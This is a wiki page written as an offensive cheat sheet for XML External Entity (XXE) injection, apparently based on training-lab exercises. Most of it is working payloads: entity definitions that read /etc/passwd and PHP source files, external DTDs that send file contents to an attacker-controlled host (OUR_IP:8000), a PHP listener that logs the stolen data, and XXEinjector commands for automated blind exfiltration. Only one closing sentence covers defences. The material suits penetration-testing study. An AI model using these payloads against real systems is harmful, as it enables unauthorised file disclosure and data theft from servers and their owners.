Bug Culture Wiki
Pages (Latest 3 updated) : Menu (Edit):
Add new Edit Delete History Source
Contents:
  1. XML External Entities (XXE)
    1. External XML Entities
    2. Local File Disclosure
    3. Advanced File Disclosure
      1. Advanced Exfiltration with CDATA
    4. Error Based XXE
    5. Blind Data Exfiltration
    6. Automated OOB Exfiltration

XML External Entities (XXE)

External XML Entities

XML External Entity (XXE) Injection vulnerabilities occur when XML data is taken from user-controlled input without proper sanitization or safe parsing. This allows attackers to leverage XML features to perform malicious actions.

Local File Disclosure

  1. Identify XML Inputs:
    The first step is to locate web pages that accept XML input from users.

  2. Look for Defined Entities:
    Examine the response for any defined entities. If the entity value is reflected in the output (instead of showing the literal entity reference), the application may be vulnerable to XXE.

  3. Testing with a Custom Entity:
    Create a new entity and call it in the XML payload:

    <!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>
   
<email>&company;</email>

    If the response outputs “Inlane Freight” instead of &company;, it confirms that XML entities are processed, and the application is vulnerable.

Note: In some tests, spaces may be replaced with $IFS to avoid breaking XML syntax. Avoid using characters like |, >, or { that might disrupt the XML structure.

Potential Exploits:

  • Reading sensitive files
  • Reading source code
  • Achieving remote code execution with XXE
  • Triggering SSRF (Server-Side Request Forgery)
  • Denial of Service (DOS) attacks

Advanced File Disclosure

Advanced Exfiltration with CDATA

Attackers can leverage an external DTD file to exfiltrate file contents using CDATA sections. For example:

  1. Create a DTD File (xxe.dtd): 
    echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000
  2. Craft the XML Payload: 
    <!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- Prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- Reference external file -->
<!ENTITY % end "]]>"> <!-- Append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- Reference our external DTD -->
%xxe;
]>

    When the external DTD is fetched and processed, the entity %joined; will contain the content of submitDetails.php.

Error Based XXE

Error-based XXE leverages the server’s error messages to leak file contents. To test this:

  1. Host a DTD with the Following Payload: 
    <!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
  2. Craft the XML Payload: 
    <!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>

Note: This method might have length limitations and may break with special characters, making it less reliable than the CDATA method.

Blind Data Exfiltration

When direct output isn’t available (i.e., the XML entities or errors are not returned), an out-of-band (OOB) method can be used:

  1. Base64 Encode the File Content Using PHP Filter:
    Utilize a parameter entity to read and encode the file.

    <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

  2. PHP Listener to Capture the Exfiltrated Data:
    Create a simple PHP script (index.php):

    <?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

    Run the PHP server:

    php -S 0.0.0.0:8000

  3. Craft the Final XML Payload:

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

    When processed, the target system sends a request to your server containing the base64-encoded content of /etc/passwd, which your PHP script decodes and logs.

Automated OOB Exfiltration

Automated tools can simplify blind XXE data exfiltration. One such tool is XXEinjector:

  1. Clone the Repository: 
    git clone https://github.com/enjoiz/XXEinjector.git
  2. Prepare the HTTP Request File:
    Copy the HTTP request from Burp and save it with a marker: 
    POST /example 
Headers: blah 
   
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
  3. Run XXEinjector:
    Use the following command (adjust flags as necessary): 
    ruby XXEinjector.rb --host=[tun0 IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter

    The exfiltrated data is base64 encoded and stored in the tool’s Logs folder. You can review it with:

    cat Logs/10.129.201.94/etc/passwd.log

    This demonstrates that the file /etc/passwd was successfully exfiltrated from the target system.

This wiki page covers various XXE attack techniques—from basic local file disclosure and advanced CDATA exfiltration to error-based and blind data exfiltration—along with methods for automating out-of-band attacks. Proper XML parsing, disabling external entity resolution, and applying robust input validation are critical to preventing these vulnerabilities. ````plaintext